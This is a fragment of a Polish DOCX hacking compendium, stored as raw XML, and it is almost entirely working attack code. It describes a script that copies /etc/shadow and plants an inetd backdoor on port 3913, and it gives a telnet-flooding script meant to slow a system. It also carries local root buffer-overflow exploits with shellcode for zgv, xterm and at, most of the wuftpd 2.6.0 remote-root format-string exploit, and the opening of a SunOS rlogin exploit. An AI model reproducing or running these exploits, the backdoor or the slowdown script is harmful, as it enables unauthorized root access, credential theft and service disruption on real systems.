        <w:t>\xf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82\x10\x20\x3b\x91\xd4\xff\x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_long get_sp(voi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__asm__("mov %sp,%i0 \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 main(int argc, char *arg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buf[BUF_LENGTH + EXTR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long targ_add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_long *long_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_char *char_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i, code_length = strlen(sparc_shellcod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long_p = (u_long *) b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i = 0; i &lt; (BUF_LENGTH - code_length) / sizeof(u_long);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long_p++ = SPARC_NO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_p = (u_char *) long_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i = 0; i &lt; code_length;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_p++ = sparc_shellcode[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long_p = (u_long *) char_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arg_addr = get_sp() - STACK_OFFS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i = 0; i &lt; EXTRA / sizeof(u_long);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long_p++ = targ_add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Jumping to address 0x%lx\n", targ_add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ecl("/usr/bin/rlogin", "rlogin", buf, (char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error("execl faile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t;&gt; Exploity dla Red Hat 6.1 &lt;&l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c) 2000 babcia padlina / b0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lcamtuf's ide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redhat 6.1 /usr/bin/man exploi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param.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stat.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ring.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NOP 0x9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OFS 18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BUFSIZE 400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ADDRS 1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ong getesp(voi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__asm__("movl %esp, %eax\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main(argc, arg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arg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arg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execshell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eb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0</w:t>
        <w:tab/>
        <w:t>\x0b"</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89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40</w:t>
        <w:tab/>
        <w:t>\xc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80\xe8\xdc\xff\xff\xff/bin/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buf, *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noplen, i, of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ong ret, *a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buf = (char *)malloc(BUFSIZE+ADDRS+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error("mallo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eturn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argc &gt;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ofs = atoi(argv[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l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ofs = OF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oplen = BUFSIZE - strlen(exec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et = getesp() + of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emset(buf, NOP, nopl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uf[noplen+1]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trcat(buf, exec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 = buf + noplen + strlen(exec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p = (unsigned long *)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i = 0; i &lt; ADDRS / 4;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p++ = r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 = (char *)a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 "RET: 0x%xá len: %d\n\n", ret, strlen(b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env("MANPAGER", buf,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ecl("/usr/bin/man", "man", "ls",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eturn 0;</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shellcod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x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59</w:t>
        <w:tab/>
        <w:t>\x58\xff\xe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xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39</w:t>
        <w:tab/>
        <w:t>\x89\x51\x0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x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0</w:t>
        <w:tab/>
        <w:t>\x40\x31\xdb"</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xcd\x8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in/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b/>
        <w:t>char *get_sp()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asm("movl %esp,%ea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bufsize 409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buffer[bufsiz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in()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i = 0; i &lt; bufsize - 4; i += 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amp;buffer[i] = get_sp() -467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set(buffer, 0x90, 51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cpy(&amp;buffer[512], shellcode, strlen(shellcod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uffer[bufsize - 1]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etenv("HOME", buffer,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ecl("/usr/bin/zgv", "/usr/bin/zgv", NULL);</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The  following  shell  script  exploit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vulnerability in  cfingerd. By  running thi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you  can execute  arbitrary commands as roo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Exploit was written by east &lt;east@l0ck.com&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l0ck r0x w1f gl0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 $# = 2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h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inger "/W;$1;#@$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l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cho "$0 \"&lt;command&gt;\" &lt;sitename&gt;"</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fi</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MAN-Exploit for MANPAGER environmental variabl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rh 6.x, tested on rh 6.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written by psychoid/tC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gives egid ma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Originally discovered by lcamt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educational. ye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ring.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main(int argc, char **arg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buff =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nsigned long *addr_ptr =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ptr =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nsigned long offs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nsigned long addi=0xbfffacc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_char execshell[]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eb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"</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89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x1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8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"</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d7\xff\xff\xff/bin/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extreme nice shellycod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argc&lt;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offset=15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els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offset=strtoul(argv[1],NULL,1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Building buffer for adress %-8x\n",offset+add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uff = malloc(406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bu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can't allocate memory\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tr = bu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Nopping..\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filling with nops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set(ptr, 0x0, 406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emset(ptr, 0x90, 406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Setting adress.. %-8x\n",pt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tr+=0xf7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addr_ptr=(long *)pt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addr_ptr++) = offset + add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shelly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Copying shell cod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tr=buff+0xf6f-strlen(exec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i=0;i &lt; strlen(execshell);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tr++) = execshell[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tr++='\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Done. Setting environmental variabl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etenv("MANPAGER",buff,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Calling ma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ecl("/usr/bin/man", "psychoid", "man",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0x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Exploity dla Slackware &lt;&lt;</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Local exploit for suid root programs linked to libtermcap &lt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">2.0.8-15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tested with xterm and nxterm on Slackware 4.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sk8@lucid-solutions.com (slackware mods by xd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Usag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smashcap  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">-default is buffer size of 4160 and </w:t>
        <w:tab/>
        <w:t>offset of 1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tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> and seems to work on Slackware 4.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Adjust offsets (somewhere between 230 - 1140) if necessar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smashcap &lt;offset&gt; </w:t>
        <w:tab/>
        <w:t>-buffer size defaults to 416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smashcap &lt;offset&gt; &lt;buffersize&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In order to stop script kids/opportunists, one MINOR change </w:t>
        <w:tab/>
        <w:t>must b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made in order for this to work.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Use only to test your machines to show you that you must patch </w:t>
        <w:tab/>
        <w:t>libtermca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Quick fix, chmod u-s ALL suid root programs linked with </w:t>
        <w:tab/>
        <w:t>libtermca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tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>- sk8 of L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fcntl.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filename "/tmp/lstermca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entry1   "xter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DEFAULT_BUFSIZE 416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shellcod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xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0</w:t>
        <w:tab/>
        <w:t>\x0b"</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x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40</w:t>
        <w:tab/>
        <w:t>\xc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x80\xe8\xdc\xff\xff\xff/bin/sh"; /* Linux shellcod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ong get_sp(voi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__asm__("movl %esp, %eax\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main(int argc, char *argv[])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bufsize, offset, i, f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long *bufpt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ptr, *buffer, *tempb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etenv("TERMCAP", "/tmp/lstermcap",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ufsize=DEFAULT_BUFSIZ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argc &gt; 2) bufsize=atoi(argv[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argc &gt; 1) offset=atoi(argv[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lse offset= 1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bufsize: %i\noffset: %i\n", bufsize,offs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buffer = malloc(bufsiz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can't allocate enough memory\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tempbuf = malloc(bufsize+strlen(entry1) )))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can't allocate enough memory\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get_sp(): 0x%x\n", get_s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get_sp()-offs: 0x%x\n", (get_sp()-offset)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tr=buff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ufptr = (long *)(buffer+2); /* align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i = 0; i &lt; bufsize; i += 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bufptr++) = (get_sp()-offs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tab/>
        <w:t xml:space="preserve">for (i = 0; i &lt; (bufsize/2); i++)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ab/>
        <w:t xml:space="preserve"> buffer[i] = 0x9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tr=buffer + ((bufsize/2) - strlen(shellcode)/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for (i = 0; i &lt; strlen(shellcode);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ab/>
        <w:t>*(ptr++) = shellcode[i]; //shellcod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ptr=ptr+2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 xml:space="preserve">*(ptr++)=0x3a;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 xml:space="preserve">*(ptr++)=0x5c;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 xml:space="preserve">snprintf(tempbuf, (bufsize+strlen(entry1)), "%s%s%s", entry1, </w:t>
        <w:tab/>
        <w:t>buff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fd = open(filename, O_WRONLY|O_CREAT|O_TRUNC, 066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write (fd, tempbuf, strlen(tempb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close(f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made termcap\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ecl("/usr/X11R6/bin/xterm","xterm",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Linux 2.0.0, 2.0.30 (SW 3.0) lpr hole : P0W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a42n8k9 znalazl buffer overflow w lpr. Testowal to na BSD 4.4 i </w:t>
        <w:tab/>
        <w:t>Linux 2.0.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Rozmiar bufora to 1023 bajty, ktory mozna stworzyc z 1023 znakow. </w:t>
        <w:tab/>
        <w:t>np: lpr ffffffffff.......ffff (to 1023 character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onizej macie eksploit, ktory da wam root'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lpr_exploit.c - Buffer overflow exploit for the lpr progra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Adapted from code found in "stack smashing..." by Aleph O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aleph1@underground.or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wisdom is knowledge passed from one to another",  Thank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Aleph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This program takes  advantage of the buffer  overflow conditio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preset in lpr program.  This program is meant as  demonstratio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only,  and the  author claims  no resposibility  for its use o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misuse.  - a42n8k9</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define DEFAULT_OFFSET          1023</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define DEFAULT_BUFFER_SIZE     2289</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define NOP                     0x9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xml:space="preserve">* The hex representation of the code to produce an interactive </w:t>
        <w:tab/>
        <w:t>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xml:space="preserve">* Oviously since this is for a Linux Box, you may need to generate </w:t>
        <w:tab/>
        <w:t>th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xml:space="preserve">* right set for your OS if you are porting this to another UNIX </w:t>
        <w:tab/>
        <w:t>syste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har shellcode []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eb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</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89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xc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x80\xe8\xdc\xff\xff\xff/bin/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unsigned long get_sp(voi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__asm__("mov %esp,%eax");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void main(int argc, char *argv[])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har *buff, *pt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long *addr_ptr, add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nt offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZ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nt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set aside the memory for our shell cod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buff = malloc(bsiz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Can't allocate memory.\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Get the address of our stack pointer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ddr = get_sp() - offs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fill our buffer with its address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tr = bu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ddr_ptr = (long *)pt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or(i = 0; i&lt;bsize; i+=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ddr_ptr++) = add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fill the first half of the buffer with NOPs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or(i=0;i&lt;bsize/2;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uff[i] = NO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add in our shell cod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tr = buff + ((bsize/2) - (strlen(shellcode)/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or(i=0;i&lt;strlen(shellcode);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tr++) = shellcode[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terminate the string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uff[bsize - 1]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load the string into an environment variabl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emcpy(buff,"EGG=",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utenv(bu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execute the shell command, thus exploiting the overflow</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since lpr is suid root, a root shell will be spawne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lpr $EGG");</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Exploity dla Irix &lt;&lt;</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IRIX 6.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YPWD=`pw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kdir /tmp/emptydi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d /tmp/emptydi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at &lt;&lt;EOF &gt;crontab</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p /bin/sh ./suid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mod 4755 suid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O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mod +x crontab</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ATH=.:$PAT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port PAT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ar/www/htdocs/WhatsNew/CustReg/day5notifier -procs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uid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d $MYPWD</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rm -rf /tmp/emptydir.$$</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login na IRIXie 5.3 - 6.3 : lcamt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Oto i exploit. Po kompilacji i uruchomieniu zapyta o haslo - </w:t>
        <w:tab/>
        <w:t xml:space="preserve">   wcisnij ENT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Jesli nie dziala - przekompiluj go z parametrem '-n3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ring.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types.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BUF_LENGTH      2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EXTRA           3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OFFSET          0x1b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IRIX_NOP        0x03e0f82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u_long unsigne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_long get_sp_code[] =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0x03a01025,0x03e00008,0x00000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_long irix_shellcode[] =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0x24041234,0x2084edcc,0x0491fffe,0x03bd302a,0x23e4012c,0xa086fe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0x2084fef8,0x20850110,0xaca4fef8,0xaca6fefc,0x20a5fef8,0x240203f3,</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0x03ffffcc,0x2f62696e,0x2f7368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buf[BUF_LENGTH + EXTRA + 8];</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 main(int argc, char **argv)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env[] =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_long targ_addr, stac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_long *long_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i, code_length = strlen((char *)irix_shellcode)+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_long (*get_sp)(void) = (u_long (*)(void))get_sp_cod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tack = get_s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long_p =(u_long *)  b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arg_addr = stack + OFFS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argc &gt;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arg_addr += atoi(argv[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hile ((targ_addr &amp; 0xff000000) == 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arg_addr &amp; 0x00ff0000) == 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arg_addr &amp; 0x0000ff00) == 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arg_addr &amp; 0x000000ff)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arg_addr += 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or (i = 0; i &lt; (BUF_LENGTH - code_length) / sizeof(u_long); i++)</w:t>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ab/>
        <w:t xml:space="preserve"> *long_p++ = IRIX_NO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i = 0; i &lt; code_length/sizeof(u_long);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long_p++ = irix_shellcode[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i = 0; i &lt; EXTRA / sizeof(u_long);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long_p++ = (targ_addr &lt;&lt; 24) | (targ_addr &gt;&gt; 8);</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long_p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stack = 0x%x, targ_addr = 0x%x\n", stack, targ_add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ecle("/bin/login", "login", "-h", &amp;buf[1], 0, en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error("execl failed");</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IRIX 5.3,6.2 /usr/bsg/ordist stack overflow : P0W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Stack overflow na ordist. Dziala z 5.3 i 6.2 na R4k, lecz nie na </w:t>
        <w:tab/>
        <w:t>R8k i R10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clude &lt;fcntl.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efine BUFSIZE 30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efine OFFS 8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efine ADDRS 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efine ALIGN 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void run(unsigned char *buf)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ecl("/usr/bsd/ordist", "ordist", "-d", buf, "-d", buf,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execl failed\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char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73</w:t>
        <w:tab/>
        <w:t>\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff</w:t>
        <w:tab/>
        <w:t>\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0</w:t>
        <w:tab/>
        <w:t>\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0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nop[]="\x24\x0f\x12\x3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nsigned long get_sp(void)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__asm__("or     $2,$sp,$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ain(int argc, char *argv[])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buf, *ptr, addr[8];</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offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIG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i, noplen=strlen(no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argc &gt;1) bufsize=atoi(argv[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argc &gt;2) offs=atoi(argv[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argc &gt;3) addrs=atoi(argv[3]);</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argc &gt;4) align=atoi(argv[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bufsize&lt;strlen(asmcod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bufsize too small, code is %d bytes long\n", strlen(asmcod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buf=malloc(bufsize+ADDRS&lt;&lt;2+noplen+1))==NULL)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Can't malloc\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exit(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nt *)addr=get_sp()+off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address - %p\n", *(int *)add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trcpy(buf, no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tr=buf+nopl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uf+=noplen-bufsize % nopl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bufsize-=bufsize % nopl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or (i=0; i&lt;bufsize;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tr++=nop[i % nopl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emcpy(ptr-strlen(asmcode), asmcode, strlen(asmcod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memcpy(ptr, nop, strlen(no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tr+=alig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or (i=0; i&lt;addrs&lt;&lt;2;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tr++=addr[i % sizeof(in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tr=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total buf len - %d\n", strlen(b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un(b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t;&gt; Exploit dla FreeBSD mtr-0.41</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lt;&l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 2000 babcia padlina / buffer0verfl0w security </w:t>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www.b0f.co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freebsd mtr-0.41 local root exploi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param.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stat.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ring.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NOP 0x9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BUFSIZE 10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ADDRS 12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ong getesp(voi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__asm__("movl %esp, %eax\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main(argc, arg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arg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arg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execshell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euid(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31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd</w:t>
        <w:tab/>
        <w:t>\x8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uid(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31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd</w:t>
        <w:tab/>
        <w:t>\x8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ecl("/bin/sh", "sh",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eb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56</w:t>
        <w:tab/>
        <w:t>\x0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89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca</w:t>
        <w:tab/>
        <w:t>\x5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51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x0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x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x0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buf[BUFSIZE+ADDRS+1], *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noplen, i, of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ong ret, *a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argc &lt; 2) { fprintf(stderr, "usage: %s ofs\n", argv[0]); exit</w:t>
        <w:tab/>
        <w:t>(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ofs = atoi(argv[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oplen = BUFSIZE - strlen(exec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et = getesp() + of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emset(buf, NOP, nopl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uf[noplen+1]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trcat(buf, execshe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env("EGG", buf,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 = b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ap = (unsigned long *)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i = 0; i &lt; ADDRS / 4;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ap++ = r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 = (char *)a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 =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 "ret: 0x%x\n", r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env("TERMCAP", buf,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ecl("/usr/local/sbin/mtr", "mtr",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eturn 0;</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t;&gt; Exploity dla Sendmailów &lt;&l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ba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Sendmail 8.8.8 mail hijackin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c) Michal Zalewski &lt;lcamtuf@ids.pl&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This exploit will hijack all Sendmail connections, loggi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mail traffic to some location (/tmp by default, change t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something more private). Normal MTA functionality i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eserved - you could call it 'transparent mail traffic </w:t>
        <w:tab/>
        <w:t xml:space="preserve">sniffer'.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NOTE: usage other than for diagnostic oreducational purpose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is simply *illegal* and villainy. Privacy is sanctit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Welcome to Sendmail 8.8.8 mail hijack exploi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Creating files in /tmp (hopefully no 'noexec' t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d /t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at &gt;test.c &lt;&lt;EO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netinet/in.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fcntl.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ignal.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errn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SERV_FD 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DIRECTORY "/t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in(int argc,char* argv[])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to_sm[2],from_sm[2],rd,fd,e1=0,e2=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buf[409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truct sockaddr_in sadd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csock,i=sizeof(sadd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strcmp("sendmail",argv[0])) execl(argv[0],"sendmail","-</w:t>
        <w:tab/>
        <w:t>bd",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ignal(SIGCLD,SIG_IG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hile (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hile ((csock=accept(SERV_FD,&amp;saddr,&amp;i))&l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fork())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printf(buf,DIRECTORY "/trans-%d-%d-in",time(0),getpi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d=open(buf,O_WRONLY|O_TRUNC|O_CREAT,06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ipe(to_s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ipe(from_s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fork())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up2(to_sm[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up2(from_sm[1],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up2(from_sm[1],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lose(to_sm[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lose(from_sm[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ecl("/usr/sbin/sendmail","sendmail","-bs",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lose(to_sm[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lose(from_sm[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hile ((!e1 || (e1==EAGAIN)) &amp;&amp; ((!e2 || e2==EAGAIN)))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cntl(csock,F_SETFL,O_NONBLOC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rd=read(csock,buf,sizeof(b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rd&gt;0) { write(to_sm[1],buf,rd); write(fd,buf,rd);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lse if (rd) e1=errno; else e1=1; /* bab00m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cntl(from_sm[0],F_SETFL,O_NONBLOC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rd=read(from_sm[0],buf,sizeof(b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rd&gt;0) write(csock,buf,rd); else if (rd) e2=errno; </w:t>
        <w:tab/>
        <w:t>else e2=1; /* kaboom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sleep(10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rite(fd,"\nEOF\n",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lose(to_sm[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lose(from_sm[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lose(f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hutdown(csock,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lose(csoc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O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Compiling takeover servic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gcc test.c -o test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map -p 25 -sS -P0 -n 127.0.0.1 &amp;&gt;/dev/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echo "* Now, on your root box (could be your own machine), you </w:t>
        <w:tab/>
        <w:t>hav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echo "  to execute following command (of course nmap is required, </w:t>
        <w:tab/>
        <w:t>g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echo "  it at www.insecure.org/nmap/). Then, you have just </w:t>
        <w:tab/>
        <w:t>second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echo "  to hit RETURN here, so the exploit could continue. Try to </w:t>
        <w:tab/>
        <w:t>fi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in less than 4 sec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ech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Command: nmap -p 25 -sS -P0 -n `hostname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w:t>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n "Hit RETURN to continu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ea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Ok, time's up... Hopefully you fit in 4 second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oexec /usr/sbin/sendmail /tmp/test -bD &a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Wait a moment, takeover in progres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leep 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killall -HUP sendmail 2&gt;/dev/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leep 3</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m -f /tmp/test /tmp/test.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Let's see what we have here... type some bogus command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and check for session transcript in choosen director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elnet 127.0.0.1 25</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y Michal Szymanski &lt;siwa9@box43.gnet.pl&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ndmail DoS (up to 8.9.3);</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at Apr  3 00:12:31 CEST 1999</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types.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socket.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netinet/in.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arpa/inet.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netd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errn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ndef VERBOSE          /* define it, if MORECONN is undefined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MORECO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define RCPT_TO      "foo@ftp.onet.p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RCPT_TO "foo@10.255.255.25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def MORECO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MAXCONN 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BSIZE   1048576         /* df* control file siz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PORT    2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buffer[BSIZ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sockfd,x,loop,chpi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 usage(char *fnam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Usage: %s &lt;victim_host&gt;\n",fna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it(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 say(char *what)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write(sockfd,what,strlen(what))&lt;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error("writ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it(errn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def VERBO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lt;%s",wha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zero(buffer,BSIZ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sleep(1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read(sockfd,buffer,BSIZE)&lt;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error("rea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it(errn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def VERBO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buff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main(int argc,char *argv[])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truct sockaddr_in serv_add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truct hostent *hos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r *hostname,hostaddr[2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Sendmail DoS (up to 8.9.3) by siwa9 [siwa9</w:t>
        <w:tab/>
        <w:t>@box43.gnet.pl]\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argc&lt;2) usage(argv[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def VERBO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gt;Preparing address. \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hostname=argv[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rv_addr.sin_port=htons(POR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rv_addr.sin_family=AF_IN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serv_addr.sin_addr.s_addr=inet_addr(hostname))==-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def VERBO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gt;Getting info from DNS.\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host=gethostbyname(hostname))==NULL)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herror("gethostbyna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it(h_errn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rv_addr.sin_family=host-&gt;h_addrtyp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copy(host-&gt;h_addr,(char *)&amp;serv_addr.sin_addr,host-&gt;h_lengt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def VERBO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gt;Official name of host: %s\n",host-&gt;h_na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hostname=host-&gt;h_na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printf(hostaddr,"%d.%d.%d.%d",(unsigned char)host-&gt;h_addr[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nsigned char)host-&gt;h_addr[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nsigned char)host-&gt;h_addr[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nsigned char)host-&gt;h_addr[3]);</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lse sprintf(hostaddr,"%s",hostna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def MORECO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 (;loop&lt;MAXCONN;loop++) if (!(chpid=fork()))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zero(&amp;(serv_addr.sin_zero),8);</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sockfd=socket(AF_INET,SOCK_STREAM,0))==-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error("sock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it(errn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if ((connect(sockfd,(struct sockaddr *)&amp;serv_addr,sizeof(serv_addr))) </w:t>
        <w:tab/>
        <w:t>== -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error("connec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it(errn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def VERBO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gt;Connected to [%s:%d].\n",hostname,POR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zero(buffer,BSIZE);read(sockfd,buffer,BSIZ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def VERBO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buff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l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ay("helo foo\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ay("mail from:root@localhost\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ay("rcpt to:" RCPT_TO "\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ay("data\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 (x=0;x&lt;=BSIZE;x++) buffer[x]='X';write(sockfd,buffer,BSIZ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ay("\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leep(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ay("quit\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hutdown(sockfd,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lose(sockf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def VERBO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printf(stderr,"&gt;Connection closed succesfully.\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def MORECO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aitpid(chpid,NULL,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eturn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t seems that sendmail ran with -t optio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oes NOT block SIGINT ... In that momen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hile we are sending data to its stdi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hen we will press CTRL-C process is bein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killed, but in queue rests unfinished lett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t stays there quite long - long enought t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ullfill partition on disk where /var/spool/mqueu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esides. When it happends, sendmail doesn'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llow new connections - so it is a kind o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oS attack for this service. It has be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ested on all new versions on sendmail u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o current (8.9.3).</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ukasz Luzar                     K.K.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http://noname.kki.krakow.pl/   lluzar@kki.p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ignal.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wait.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DELAY 5              /* time in seconds needed to reac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MaxMessageSize limit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SM_PATH "/usr/sbin/sendmail -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 mai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ILE    *f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pi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pid = fork()) == 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etpgr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fd = popen( SM_PATH, "w")) ==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 stderr, "popen error\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fputc( 'A', f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 els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leep( DELA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kill( (-1) * pid, SIGIN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 stdout, "next\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ait(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against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.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 1999 by &lt;marchew@linux.lepszy.od.kobiety.pl&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sage: ./against existing_user_on_victim_host victim_hos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ample: ./against nobody lamers.n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param.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socket.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time.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netinet/in.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netd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arg.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errn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ignal.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getopt.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ring.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MAXCONN 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LINES   150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truct hostent *h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truct sockaddr_in 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suck,loop,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main(int argc,char* argv[])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against.c - another Sendmail DoS (up to 8.9.2)\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argc-3)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Usage: %s victim_user victim_host\n",argv[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hp=gethostbyname(argv[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hp)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error("gethostbyna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stderr,"Doing mess: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loop&lt;MAXCONN;loop++) if (!(x=fork()))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ILE* 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copy(hp-&gt;h_addr,(void*)&amp;s.sin_addr,hp-&gt;h_lengt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sin_family=hp-&gt;h_addrtyp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sin_port=htons(2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suck=socket(AF_INET,SOCK_STREAM,0))&lt;0) perror("socke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connect(suck,(struct sockaddr *)&amp;s,sizeof(s))) perror</w:t>
        <w:tab/>
        <w:t>("connec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d=fdopen(suck,"w"))) { perror("fdopen"); exit(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sleep(100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d,"helo tweety\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d,"mail from: tweety@polbox.com\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d,"rcpt to: %s@%s\n",argv[1],argv[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d,"data\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usleep(100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loop=0;loop&lt;LINES;loop++)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loop%100)) fprintf(stder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d,"To: x\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d,"\n\n\nsomedata\n\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d,".\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leep(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d,"quit\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flush(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leep(1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hutdown(suck,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lose(suc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aitpid(x,&amp;loop,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printf(stderr,"ok\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return 0;</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t;&gt; Exploity dla Pine &lt;&l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Pine 4.xx &amp; ipod3d 4.x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file.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stat.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in(int argc,char* argv[])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i,a=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s[1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truct stat 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argv[1]) exit(printf("Usage: %s account_name\n",argv[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printf(s,"/var/spool/mail/%s",argv[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stat(s,&amp;x)) exit(printf("Mailbox (%s) not found.\n",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printf(s,"/tmp/.%x.%x",(int)x.st_dev,(int)x.st_in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chmod(i=open(s,O_RDWR|O_CREAT,0600),066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hile (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lseek(i,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rite(i,"-1",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truncate(i,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sync(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a++) if (!flock(i,LOCK_EX)) printf("Got lock on %s.</w:t>
        <w:tab/>
        <w:t>\n",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lse printf("File %s already locked, wait...\n",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leep(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csh -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inelock.c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ritten 12/97 by Iconoclast -&gt; iconoclast@thepentagon.co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This program can exploit the vulnerabilities of pine lock files </w:t>
        <w:tab/>
        <w:t>in version 3.96</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which are mode 666 to log a person off or kill one of their </w:t>
        <w:tab/>
        <w:t>processes if a secon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instance of pine is started.  It only works if they open a </w:t>
        <w:tab/>
        <w:t>second session of pi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It could be useful if root likes to open up two sessions of </w:t>
        <w:tab/>
        <w:t>pi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lea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ls -la /tmp|egrep 'rw-rw-rw-.*\.[0-9a-f]+\.[0-9a-f]+$' &gt; /tmp/aa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wk '{print $3}' /tmp/aa &gt; /tmp/bb</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wk '{print $9}' /tmp/aa &gt; /tmp/ddfile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touch /tmp/cc /tmp/ee /tmp/gg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each i ( `cat /tmp/bb`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grep $i /etc/passwd &gt;&gt; /tmp/cc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awk -F: '{print $5}' /tmp/cc &gt; /tmp/ff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k=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foreach i( `cat /tmp/dd` )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echo $k &gt;&gt; /tmp/gg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k = `expr $k +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cat /tmp/$i &gt;&gt; /tmp/e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echo "" &gt;&gt; /tmp/e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aste -d " " /tmp/gg /tmp/dd /tmp/ee /tmp/bb /tmp/ff&gt;/tmp/h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The following users are running pi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lock file  pid "   " uid "     " user na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cat /tmp/hh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Pick from the choices below."</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1) Try to log them of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2) Try to kill a proces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3) Exi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n "Choic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input = $&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input" == "3") th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d /t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m -f aa bb cc dd ee ff gg h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xi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input" == "1"||"$input" == "2") th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n "Pick a number you'd like to tr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number = $&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k=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each i (`cat /tmp/d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k = `expr $k +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k" == "$number") th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filename = $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goto labe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abe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input" == "1") th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99999999999999999999999999999999 &gt;! /tmp/$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Kill code has been inserte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input" == "2") th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gt;! /tmp/$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Below are the processes the person is runnin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s -la /tmp/$i &gt; /tmp/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awk '{print $3}' /tmp/ll &gt; /tmp/mm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uid = `cat /tmp/m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ps -ef|grep $uid &gt; /tmp/jj</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umber generator and past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wk '{print $1}' /tmp/jj &gt; /tmp/k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k=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m -f /tmp/g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ouch /tmp/g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each i( `cat /tmp/kk`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echo $k &gt;&gt; /tmp/gg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k = `expr $k +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aste -d " " /tmp/gg /tmp/jj &gt; /tmp/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at /tmp/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n "Pick a proces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number2 = $&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wk '{print $3}' /tmp/nn &gt; /tmp/o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k=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oreach i( `cat /tmp/o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t k = `expr $k + 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k" == "$number2") th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goto label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abel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i &gt;! /tmp/$filena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Kill code has been inserte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di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d /t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m -f aa bb cc dd ee ff gg hh jj kk ll mm nn oo #clean up files</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ab/>
        <w:t>cd</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bin/s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pine bug exploi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usage: pine.sh username path/file_to_create &a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ex:    pine.sh root /.rhosts &a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ex2:   pine.sh root /.rhosts &gt; out &amp; (and go to slee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version 3.91, 3.92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version 3.95 fixe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Note: must do some changes in the script. look 4 CHANGE THI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Yea i know is a lame script but is better than nothin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try to exploit the bug without a script and you will wai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forev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rgumentos=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f [ $# -eq $argumentos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h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cho "Usage: $0 username path/file_to_create &amp;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cho "ET Lownoise 1996 Colombi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sername=$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rchivo=$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HANGE THI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ext='text to puit in file to creat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sr=path of the program user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pineprog=how the pine program appears when u do a w (who) </w:t>
        <w:tab/>
        <w:t>comman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ext='+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sr=user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ineprog=pi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at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Looking for $1 to log in... just wai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trada=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ntro=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ntil [ $entro -eq $entrada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nombre in `$us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 $nombre = $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h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ntro=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o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o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at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Ok $username is logged now."</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Lets wait that $1 run pin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oejecuto=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jecuto=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ntil [ $ejecuto -ne $noejecut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ejecutando in `w $userna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 $ejecutando = $pineprog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h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at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cho '- OK ' $1 ' is running ' $pineprog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jecuto=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o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o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Now lets grab the lock file of $username from /t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s -al /tmp | grep $username &gt; temp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at temp1 | grep rw-rw-rw- &gt; tempora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ockfile=`awk '{print $9}' tempora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m temp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m tempora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gt; Username $userna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gt; Lockfile $lockfil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OK now im going to wait that $usernam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quits $pineprog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do it till exist lockfile, that means username havent quit pi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d /t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hile [ -s $lockfil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leep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o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at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OK $username quit $pineprog .. now to link $lockfil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rchivo is the complete path of file in userna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d /t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n -s $archivo $lockfil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lockfile is now linked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username must now return to pine to creat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archiv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Waiting $username to return pin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noejecuto=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jecuto=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until [ $ejecuto -ne $noejecut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ejecutando in `w $usernam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 $ejecutando = $pineprog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h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at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cho '- OK ' $username ' is running ' $pinepro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jecuto=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do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on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Introducing tex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d /tm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text &gt; $lockfil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echo "- Erasing $lockfil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rm $lockfil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d</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echo "THE END DUD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HACKING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t;&gt; Sendmail scanners &lt;&l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en program sprawdza wersję sendmaila na serwerach podanych w plik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Sendmail-SCANNER 1.0b for Linux (gcc 2.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c) lcamtuf '97</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E-mail: lcamtuf@polbox.co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 przeciwienstwie do wersji dla Windows95 nie wykrylem zadnych </w:t>
        <w:tab/>
        <w:t>bugow i chyba wszystko dziala tak jak powinn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ys/socket.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ignal.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netinet/in.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netd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string.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clude &lt;unistd.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efine TIMEOUT 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ILE *serv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int sock,t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 timeout(int signo) { to=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 sm(char *host)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inbuf[102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truct sockaddr_in si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truct hostent *h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hp=gethostbyname(hos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h_errno!=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Nie moge namierzyc %s, pomijam...\n",hos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retur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copy(hp-&gt;h_addr,(char *) &amp;sin.sin_addr,hp-&gt;h_lengt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in.sin_family=hp-&gt;h_addrtyp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in.sin_port=htons(2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ock=socket(AF_INET,SOCK_STREAM,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1&lt;connect(sock,(struct sockaddr *) &amp;sin,sizeof(si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Polaczenie z %s: ", hos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ls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Nie moge polaczyc sie z %s, pomijam...\n",hos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retur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erver=fdopen(sock,"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hile(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ignal(SIGALRM,timeou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to=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alarm(TIMEOU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x=recv(sock,inbuf,1024,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alarm(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x==-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polaczenie przerwan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to)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przekroczony czas oczekiwania)\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flush(stdou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strlen(inbuf)!=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buf[strlen(inbuf)-strlen(index(inbuf,';'))]=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s\n",inbu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brea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lose(soc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oid 